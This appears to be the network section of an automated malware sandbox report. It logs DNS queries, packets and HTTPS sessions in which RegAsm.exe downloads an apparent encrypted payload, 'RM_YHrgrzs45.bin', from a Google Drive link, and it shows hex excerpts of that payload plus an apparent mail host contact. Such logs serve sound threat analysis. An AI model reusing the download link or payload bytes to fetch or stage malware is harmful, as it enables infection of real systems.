                                                                            Oct 13, 2021 19:30:43.458750010 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.458947897 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.459163904 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.459371090 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.459405899 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.459603071 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.459904909 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.460172892 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.460225105 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.460453987 CEST49792443192.168.11.20172.217.18.97
                                                                            Oct 13, 2021 19:30:43.460761070 CEST44349792172.217.18.97192.168.11.20
                                                                            Oct 13, 2021 19:30:43.461002111 CEST49792443192.168.11.20172.217.18.97

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 13, 2021 19:30:42.341810942 CEST6069253192.168.11.201.1.1.1
                                                                            Oct 13, 2021 19:30:42.372731924 CEST53606921.1.1.1192.168.11.20
                                                                            Oct 13, 2021 19:30:43.130477905 CEST5680053192.168.11.201.1.1.1
                                                                            Oct 13, 2021 19:30:43.174413919 CEST53568001.1.1.1192.168.11.20
                                                                            Oct 13, 2021 19:32:18.353400946 CEST5855153192.168.11.201.1.1.1
                                                                            Oct 13, 2021 19:32:18.772041082 CEST53585511.1.1.1192.168.11.20
                                                                            Oct 13, 2021 19:32:19.397310972 CEST5094253192.168.11.201.1.1.1
                                                                            Oct 13, 2021 19:35:54.122574091 CEST6263253192.168.11.201.1.1.1
                                                                            Oct 13, 2021 19:35:54.161763906 CEST53626321.1.1.1192.168.11.20

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Oct 13, 2021 19:30:42.341810942 CEST192.168.11.201.1.1.10xd88aStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                            Oct 13, 2021 19:30:43.130477905 CEST192.168.11.201.1.1.10xa105Standard query (0)doc-0c-88-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                            Oct 13, 2021 19:32:18.353400946 CEST192.168.11.201.1.1.10x1e51Standard query (0)mail.tccinfaes.comA (IP address)IN (0x0001)
                                                                            Oct 13, 2021 19:32:19.397310972 CEST192.168.11.201.1.1.10x6c0eStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)
                                                                            Oct 13, 2021 19:35:54.122574091 CEST192.168.11.201.1.1.10x5a8eStandard query (0)spclient.wg.spotify.comA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Oct 13, 2021 19:30:42.372731924 CEST1.1.1.1192.168.11.200xd88aNo error (0)drive.google.com172.217.168.46A (IP address)IN (0x0001)
                                                                            Oct 13, 2021 19:30:43.174413919 CEST1.1.1.1192.168.11.200xa105No error (0)doc-0c-88-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                            Oct 13, 2021 19:30:43.174413919 CEST1.1.1.1192.168.11.200xa105No error (0)googlehosted.l.googleusercontent.com172.217.18.97A (IP address)IN (0x0001)
                                                                            Oct 13, 2021 19:32:18.772041082 CEST1.1.1.1192.168.11.200x1e51No error (0)mail.tccinfaes.comtccinfaes.comCNAME (Canonical name)IN (0x0001)
                                                                            Oct 13, 2021 19:32:18.772041082 CEST1.1.1.1192.168.11.200x1e51No error (0)tccinfaes.com188.93.227.195A (IP address)IN (0x0001)
                                                                            Oct 13, 2021 19:32:19.407392025 CEST1.1.1.1192.168.11.200x6c0eNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                            Oct 13, 2021 19:35:54.161763906 CEST1.1.1.1192.168.11.200x5a8eNo error (0)spclient.wg.spotify.comedge-web.dual-gslb.spotify.comCNAME (Canonical name)IN (0x0001)
                                                                            Oct 13, 2021 19:35:54.161763906 CEST1.1.1.1192.168.11.200x5a8eNo error (0)edge-web.dual-gslb.spotify.com35.186.224.25A (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • drive.google.com
                                                                            • doc-0c-88-docs.googleusercontent.com

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.11.2049791172.217.168.46443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            2021-10-13 17:30:42 UTC0OUTGET /uc?export=download&id=1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrC HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            2021-10-13 17:30:43 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Wed, 13 Oct 2021 17:30:43 GMT
                                                                            Location: https://doc-0c-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/d4i6055jl54qaa9s37lc8j7fnoiuafqn/1634146200000/00014782062933200622/*/1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrC?e=download
                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                            Content-Security-Policy: script-src 'nonce-EK9VF7tZE3uWo3/br+Yq2A' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-XSS-Protection: 1; mode=block
                                                                            Server: GSE
                                                                            Set-Cookie: NID=511=DXhWJLTHchb8Jh_10Rbl-nC9DTf-hzeUZT7WQ52fG4MqbmK7K6qJlV5uuq9LXKI7QXfGbqfIY0csTWKhAj93NhxkJT9EA3gRW5UujNi_Yx3mdfcQk9gFPWSM7HnF781QmeTsX8ep6-R_HXFPPZjBdZxuwxpgS8lwJVzhRuGhVes; expires=Thu, 14-Apr-2022 17:30:42 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                            Accept-Ranges: none
                                                                            Vary: Accept-Encoding
                                                                            Connection: close
                                                                            Transfer-Encoding: chunked
                                                                            2021-10-13 17:30:43 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 63 2d 38 38 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 64 34 69 36
                                                                            Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0c-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/d4i6
                                                                            2021-10-13 17:30:43 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.11.2049792172.217.18.97443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            2021-10-13 17:30:43 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/d4i6055jl54qaa9s37lc8j7fnoiuafqn/1634146200000/00014782062933200622/*/1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrC?e=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                            Cache-Control: no-cache
                                                                            Host: doc-0c-88-docs.googleusercontent.com
                                                                            Connection: Keep-Alive
                                                                            2021-10-13 17:30:43 UTC2INHTTP/1.1 200 OK
                                                                            X-GUploader-UploadID: ADPycdswHan_yytvlzmPQhO7dMAFVuhtgXN0UpxiIGLSCmKjH4BQ9JmsFYUITi6_oqQmIjejCVYz9FKpwHVxMxb7j08dqwri6Q
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Credentials: false
                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                            Access-Control-Allow-Methods: GET,OPTIONS
                                                                            Content-Type: application/octet-stream
                                                                            Content-Disposition: attachment;filename="RM_YHrgrzs45.bin";filename*=UTF-8''RM_YHrgrzs45.bin
                                                                            Content-Length: 221760
                                                                            Date: Wed, 13 Oct 2021 17:30:43 GMT
                                                                            Expires: Wed, 13 Oct 2021 17:30:43 GMT
                                                                            Cache-Control: private, max-age=0
                                                                            X-Goog-Hash: crc32c=kxLsWg==
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                            Connection: close
                                                                            2021-10-13 17:30:43 UTC5INData Raw: e8 65 09 d9 c2 78 7c 07 58 ae d5 f4 ca 5a 30 76 6e c7 87 19 2a b1 fc 82 4a c9 fb d5 32 c3 9d ca d1 65 f3 cb 22 32 76 67 11 c6 6e 44 af 1c 62 11 3d 98 ed 40 20 98 47 b3 3d 10 18 c7 06 1e d3 50 c3 03 04 5d 99 57 ad d4 b5 23 81 0f 8b 16 1f 27 68 9e 66 96 05 32 67 9c c5 88 a5 e0 56 c1 8d 99 01 a7 87 08 00 71 54 44 d3 8f 9e 0f c4 a8 92 18 d3 e6 e6 29 aa f4 4c 6a 7a ab bf d4 e8 62 1a 5f 48 53 cb cc 66 b9 d2 b6 63 01 27 14 9e c8 60 66 6b ff ca 4e 4a 91 2a d0 30 60 01 2e 6b f6 7a 76 ff fc 55 35 05 e6 14 12 8f cd 7a f1 00 01 78 4d c0 37 fa f4 8d a5 1e 92 ed 20 ce 39 ae f3 79 0e 90 43 03 c3 34 eb 57 e3 71 0f 26 31 1f 48 cf ac 0f 31 b5 d4 28 58 30 ed 62 5a 4b 3a a7 f8 62 fd 87 20 4c 32 17 5e ac 7e 14 d5 69 7f de 19 75 ef 63 5f cb fd ee 53 b6 0f 77 56 8d 38 dc 90 36
                                                                            Data Ascii: ex|XZ0vn*J2e"2vgnDb=@ G=P]W#'hf2gVqTD)Ljzb_HSfc'`fkNJ*0`.kzvU5zxM7 9yC4Wq&1H1(X0bZK:b L2^~iuc_SwV86
                                                                            2021-10-13 17:30:43 UTC9INData Raw: 51 ad a0 c9 24 49 6c 8d 1f ac 48 2f 70 43 8d a9 62 2a b6 89 3c 81 e1 70 a6 85 3a 21 ef 8b 40 13 1a 7d 10 19 1d 9c cf bb f6 ed 62 6b d5 af ed 72 d0 70 95 de 6a 78 08 d3 28 6c e2 2a 1d ab ab c7 d1 ba 65 44 83 9c e9 9c 70 ff 96 fe a7 15 f7 41 16 b7 25 4c f1 8d 08 dd ef 3d fe 32 57 85 29 f7 be ed 74 61 b6 31 b5 f5 5f 23 cc ba 8e 8e 5e bc 02 85 07 d6 a4 2d 8e 68 4d f7 b3 90 3c ef 97 65 cd fb 65 d1 7c 40 50 c9 91 57 08 cd 3f e8 2e 92 29 dc 3a b9 84 c5 05 8f fb 4c 9d c9 9f 5c bb f0 1b a0 bb ea 62 59 76 23 f8 ee 3e b8 bf da 67 fa 01 17 90 e7 64 62 c8 97 da 6f a0 ab 6e ca dc f0 e4 a4 8e 67 ca 55 e2 ef 8d db 58 a8 25 83 d1 33 c2 50 aa 83 b4 4c 2f 63 9d 13 04 7d 2f 7d b4 74 ef 08 52 d8 25 b5 3e ff d8 e7 b4 8f 51 ff 66 1d f1 5b 38 a8 a2 55 6e 46 54 db 4e 92 7a 21 77
                                                                            Data Ascii: Q$IlH/pCb*<p:!@}bkrpjx(l*eDpA%L=2W)ta1_#^-hM<ee|@PW?.):L\bYv#>gdbongUX%3PL/c}/}tR%>Qf[8UnFTNz!w
                                                                            2021-10-13 17:30:43 UTC13INData Raw: 58 fd ec f4 af c7 53 a6 bb 10 ed cd 23 5e a0 59 90 e9 48 a6 3c f1 41 8b 74 3a 88 81 d4 ac c7 b8 40 33 dd 06 a8 15 61 36 f3 06 a5 de fb ae 08 a7 db c7 f8 9c 73 aa 1e e7 83 52 4c ef af 89 58 15 72 82 21 9f ee 3c c6 86 b6 18 1a d5 d9 ae b3 ca ba b8 a8 5a 0d 15 78 b0 8f 33 70 9e 0b 00 8c 5f e4 00 cd 4d 90 a6 b7 d0 38 f9 3d 9f 21 ab bb 13 96 ab f3 3b 5a 5a c7 60 98 7b 96 66 66 c6 9c 0a bc 90 a8 b8 25 47 99 d3 6a 47 85 eb 31 b3 72 a9 59 6f c1 99 c2 a7 0e 46 ca e0 11 c6 2d 5f c4 d4 09 d8 fa 27 db 79 87 ed 8c d5 95 ab 8c f0 64 65 cd 29 64 ea e3 51 fd 00 16 e2 32 69 2a b8 65 ef b5 d4 1a 85 96 5f c6 fa 93 46 0a e2 c3 6f 8a 8b f4 f5 6a 5a cf 51 33 71 b9 90 80 63 59 d7 40 2f 3e 12 1f d7 24 fd 79 ec 80 5f 8e 1a 0c 51 8b 8c 8f 13 0b 13 93 16 89 2d 61 0c 7d ae bb 0c 62
                                                                            Data Ascii: XS#^YH<At:@3a6sRLXr!<Zx3p_M8=!;ZZ`{ff%GjG1rYoF-_'yde)dQ2i*e_FojZQ3qcY@/>$y_Q-a}b
                                                                            2021-10-13 17:30:43 UTC16INData Raw: c4 64 b0 00 97 74 47 0e a4 0e c1 26 cb 2c cc 12 19 cd 71 be 26 7f ed 84 5d 7a d9 4a 41 06 84 b0 e4 83 81 af 2f f0 81 0a 56 c9 87 d3 f6 d3 ea ba 4f a5 7e 4a 6e fc 8e e0 72 85 24 ef 61 58 2e 3d a3 09 1f 24 28 76 4b d4 a8 30 5a 09 15 0e f4 64 db 3e c7 56 f9 8e 59 9e 4e b1 46 86 fc ed 23 81 09 67 c0 37 9c d2 9e 60 87 2c 1a db 9e 85 8e 8d c7 56 c1 87 b1 5f a7 87 0e 13 5b 7c f9 d1 8f 98 1e ed 80 2c 1a d3 e0 ce 0e aa f4 46 42 24 ab bf d2 7b 4e 32 e2 44 4c 77 d3 4f 25 64 79 42 bf 0e 7f 53 e9 3e 26 5c 8c ea 38 2b d0 65 1f 53 0d 27 5c 23 b0 d4 1b 8b da 1f 77 25 94 6b 54 f1 a4 14 d7 57 63 03 d0 af 58 98 80 8a 80 41 9a c9 26 e6 1e ae f3 73 26 9e 06 03 c5 6b c2 7c 22 4b 33 68 5c 0e 62 dc a5 1e 1f bf c5 e5 4b 34 fd 60 34 89 3a a7 aa 76 03 85 20 23 fb 17 5e a6 69 a4 a1
                                                                            Data Ascii: dtG&,q&]zJA/VO~Jnr$aX.=$(vK0Zd>VYNF#g7`,V_[|,FB${N2DLwO%dyBS>&\8+eS'\#w%kTWcXA&s&k|"K3h\bK4`4:v #^i
                                                                            2021-10-13 17:30:43 UTC18INData Raw: 4e e6 68 44 5a fb 94 c0 85 c7 57 de 8b 38 ed c9 0d 33 a7 36 48 e2 57 b4 07 d1 41 9a 7a 31 8e 57 e7 80 c9 b7 79 e3 f0 2f 88 15 44 18 66 19 b4 c7 ec 93 0d b0 c4 11 c1 b0 78 bf d1 4f 97 52 4c 90 ac 90 4b 15 6a d3 b9 80 fc c2 dc 27 ae 11 05 db e2 9d a0 8a aa 32 78 4b 1e 17 da b0 cb 3d f0 88 27 0b 81 61 89 6f cf 4b be 53 af c3 3a 96 54 9b 37 5f 18 2e d5 a4 c8 67 58 4b c5 dd 91 c5 8e 62 1d ed 99 38 47 2f 45 05 5c 2f 80 d3 6e 6b d7 cf 31 b9 da 92 0a 45 eb ff c8 a6 08 e4 d3 a0 39 ac 3b 54 e5 e7 6e dd ed df f2 7d 85 f5 81 c4 95 d2 a0 f1 48 6d f2 f2 66 ed fd 87 d2 2e 14 cf 5f 3a c9 90 1a c5 dd d0 18 ab 25 23 c6 f0 b1 18 26 e2 c5 41 cc 06 f4 ff 75 78 74 0e 33 7b ac ab 1c 4b 61 dd 5f 2f 6c 33 61 d9 25 d5 e6 f5 b3 23 8e fa 0e 51 87 8c 3c 13 0b 1f aa 69 e4 ff 67 24 ec
                                                                            Data Ascii: NhDZW836HWAz1Wy/DfxORLKj'2xK='aoKS:T7_.gXKb8G/E\/nk1E9;Tn}Hmf._:%#&Auxt3{Ka_/l3a%#Q<ig$
                                                                            2021-10-13 17:30:43 UTC19INData Raw: 26 58 03 ee 34 0e 0c 8e ea 3e 66 f7 4d a2 5e 0d 21 4d 10 98 14 18 8b dc 37 50 48 9d 61 7c a1 a4 14 d1 3f 47 2b 6d a2 58 9e 91 b9 a8 13 99 c9 20 ce 39 24 fa 79 0e ce 06 03 c3 e0 e3 54 e3 46 33 6e 50 05 48 cf ad 0f 31 b5 d4 6f 51 32 ec 67 5b 40 3a 12 a9 61 fd 88 28 4c 32 0d 5e ac 7f 5a a3 6a 7f 1a 30 75 ef 6d 5f cb fd 3c 5a f6 0f 78 76 8d 38 c6 92 36 b9 20 6d de cd d0 16 6d ba f3 7c db cb f1 53 c8 19 d4 c6 5c 0d 09 f6 f7 8b 5c a4 d3 9c da 40 66 9e 15 bd 4c 40 2a 49 8d a3 7d 2f a7 8c 2c 5f d1 78 8a 83 33 4e a0 81 40 19 c8 a3 1a 11 17 90 c7 d4 ae ed 62 61 13 87 c3 71 d0 76 9f 00 4d 5a 3f d3 26 66 ca 04 5c a1 ad cd f6 82 65 44 93 42 e9 9b 5a ff 96 fe f4 37 f7 41 07 b7 5c 4c 82 08 08 d7 e0 3d fe 32 4f 85 70 f6 fc 76 74 6b c2 3b b5 f5 4c 23 cc ba a4 29 5e ae 17
                                                                            Data Ascii: &X4>fM^!M7PHa|?G+mX 9$yTF3nPH1oQ2g[@:a(L2^Zj0um_<Zxv86 mm|S\\@fL@*I}/,_x3N@baqvMZ?&f\eDBZ7A\L=2Opvtk;L#)^
                                                                            2021-10-13 17:30:43 UTC20INData Raw: f7 56 91 70 22 86 81 d4 ac cb 9a 5a 06 b6 d1 77 ea 67 1a 51 19 b4 de cf ac 19 3a c3 39 f9 97 78 b5 1d 7c 85 56 74 6e a2 90 4b 11 63 97 3c 7e fd ee c2 bc b7 0b 16 de f1 cc b5 dd 42 1b 9b 4a 06 02 7c a1 9a 2e 96 61 26 27 8c 61 ff 6d cf 47 9b 1d be c7 3c e8 28 81 c9 54 96 3a be ea fb 2c 5e 4b d2 7b 9b 7b 96 66 63 e4 91 a8 5f 71 44 43 22 28 84 ce 94 42 81 ca 26 99 66 90 4e 5f d2 9d d6 58 0f 6a d3 e7 7e ba 3b 54 e5 cd 66 2f ed d9 d0 79 98 e8 94 d1 92 ac 76 e7 b6 66 f6 21 73 fe ff af ed 28 0a 37 31 6e cb bb 15 d5 ce 2d e7 52 05 48 10 fc b3 39 86 55 f7 e8 07 a1 f4 ff 75 4b 73 0a 33 f6 ba b8 1b 4b 59 dd 4e 0d 6b 4f 1f d1 2f a6 3c ed 80 53 b5 6a 70 4b 8d a4 10 3f 5a 08 bc 10 90 2d 67 20 89 4e ba 06 4c 9a 5a fc 71 7e 34 d3 86 8a 64 b2 bf 9e 74 71 d6 1a f9 a2 5f d7
                                                                            Data Ascii: Vp"ZwgQ:9x|VtnKc<~BJ|.a&'amG<(T:,^K{{fc_qDC"(B&fN_Xj~;Tf/yvf!s(71n-RH9UuKs3KYNkO/<SjpK?Z-g NLZq~4dtq_
                                                                            2021-10-13 17:30:43 UTC22INData Raw: f2 3a 85 6d 7c a7 bb 1e 2f 45 62 21 71 20 4d 9e 91 a2 a3 0c 93 c5 20 c6 22 50 f2 55 1d c6 2e e4 c1 78 ec 7c 0b 4b 33 68 3f 67 48 cf a6 05 2d b9 d4 c0 41 cc ed 45 48 46 12 44 a2 61 fb af cc 4e 32 11 31 d4 7e 5a a9 60 65 d2 39 7d f0 6c a1 ca d1 e9 54 ec 09 d5 69 9d 34 dc 9a 20 46 21 41 dc da 3d 1f 65 a5 ef 82 da e7 1c 71 cd 21 ab 38 a3 f2 39 ed c7 8e 5c 6f d3 9c 24 63 66 9e 0a bf 64 bf 26 43 87 cc 45 2f a7 86 59 6a d1 79 80 89 ee fd b8 8b 40 3c ee 94 1a 11 3b 96 c5 fc 5e ed 62 6b 1a 83 e3 70 d4 76 9f 8d 03 50 3f d2 25 b6 b6 04 1f aa 85 d9 f9 82 6f 6c 89 43 e9 90 53 71 21 26 1e 2e f2 57 1f a6 58 23 e6 03 08 dd e6 2c fb 20 54 ad 31 f7 fc 70 52 6c c0 5d 65 89 5f 23 cd 92 37 23 5e a4 30 85 06 d7 b5 71 d0 40 cb f6 b3 9a 9e fc 91 62 de d5 3f d8 6f 4d 0f c1 b1 57
                                                                            Data Ascii: :m|/Eb!q M "PU.x|K3h?gH-AEHFDaN21~Z`e9}lTi4 F!A=eq!89\o$cfd&CE/Yjy@<;^bkpvP?%olCSq!&.WX#, T1pRl]e_#7#^0q@b?oMW
                                                                            2021-10-13 17:30:43 UTC23INData Raw: 1d ba 3d 38 d5 bf 6e cb 29 6a 96 56 c2 59 b5 4a 46 1d 68 80 21 80 ed c6 df 54 ba 3d 16 a4 d3 dd b1 ce 94 e5 b7 49 14 7e 15 a1 8b 20 84 86 34 0f 85 58 c8 76 31 4c ba 1f ab ac 3b f8 2c 91 49 70 ba 3f 91 b4 7a 29 72 65 c3 7f 8a 93 69 4b 48 f0 85 21 50 6d 46 43 34 c7 81 ff 69 54 be cb 31 a2 7c 9e b4 5e ef 9b e1 a3 36 2f 3d 1f ee df 2c 82 e3 c7 00 ee 2e cf f0 55 85 f5 9c e5 96 bd f1 f6 48 67 f5 22 64 fc d3 e7 fc 2c 12 49 10 42 c9 94 6e c9 b5 d2 1c 81 33 21 e5 f0 bb 34 1f d1 dd 39 34 8b f4 fb fb e7 55 3f 1f 59 f2 b8 1b 65 74 d8 82 76 b5 4d 1f fc 3b ab c1 ec 80 51 be 5e 18 2f a8 a4 14 17 85 ae ad 5f 87 05 2c 24 e6 a8 96 03 97 bf a3 fd 0f 4d 7d d3 82 9a 98 ad 9f 59 44 60 d1 0b 15 a3 5f d5 8a a7 c7 cb c8 5f d5 28 af 7e 74 1d 04 06 d0 2e e7 e2 3c 10 1f a4 9f 9a 26
                                                                            Data Ascii: =8n)jVYJFh!T=I~ 4Xv1L;,Ip?z)reiKH!PmFC4iT1|^6/=,.UHg"d,IBn3!494U?YetvM;Q^/_,$M}YD`__(~t.<&
                                                                            2021-10-13 17:30:43 UTC24INData Raw: 73 18 7b 0e c0 04 1c bb 4b f3 2a eb 49 33 6a 78 13 4b cf aa 27 15 b5 d4 c2 d8 3a ec 69 5f 9d f7 a5 a0 61 ff 98 51 7f 2b 69 56 ac 7e 5e 8b 67 7c de 3f 5d cb 63 5f c1 7d e6 53 f6 0b aa d9 8f 38 dc 90 29 c2 13 74 a0 c5 31 1f 69 92 f3 7f db cd 36 7e c8 19 d1 46 54 0d 13 f2 2a 1b 5e a4 d3 9e 3b 32 55 87 65 b5 4c 40 22 6b 82 a0 71 29 8f a8 36 5f db f9 82 83 33 4a 65 f8 42 19 c6 a1 05 31 02 83 b9 dc a1 ed 66 49 53 85 c3 76 f8 52 9f 00 72 d0 37 d3 28 62 17 51 1d ab ad e5 fd 82 65 42 e6 4b e8 9a 50 90 9d ff a6 37 df 45 14 b7 5a 23 ee 03 08 dd 80 37 ff 32 5f 93 8e f6 a3 74 6b 79 48 30 a3 0b 5e 7c ce 9a 87 23 5e ae e6 84 11 29 be 42 89 48 ff f6 b3 90 d7 ee 81 8a ce 8c 00 bb 7e c6 5b fa 91 56 66 cb 38 c0 6e fd 2e d7 55 f8 ac d5 0c 89 ea 4c 4c c9 9f 5c 91 c5 39 62 c4
                                                                            Data Ascii: s{K*I3jxK':i_aQ+iV~^g|?]c_}S8)t1i6~FT*^;2UeL@"kq)6_3JeB1fISvRr7(bQeBKP7EZ#72_tkyH0^|#^)BH~[Vf8n.ULL\9b
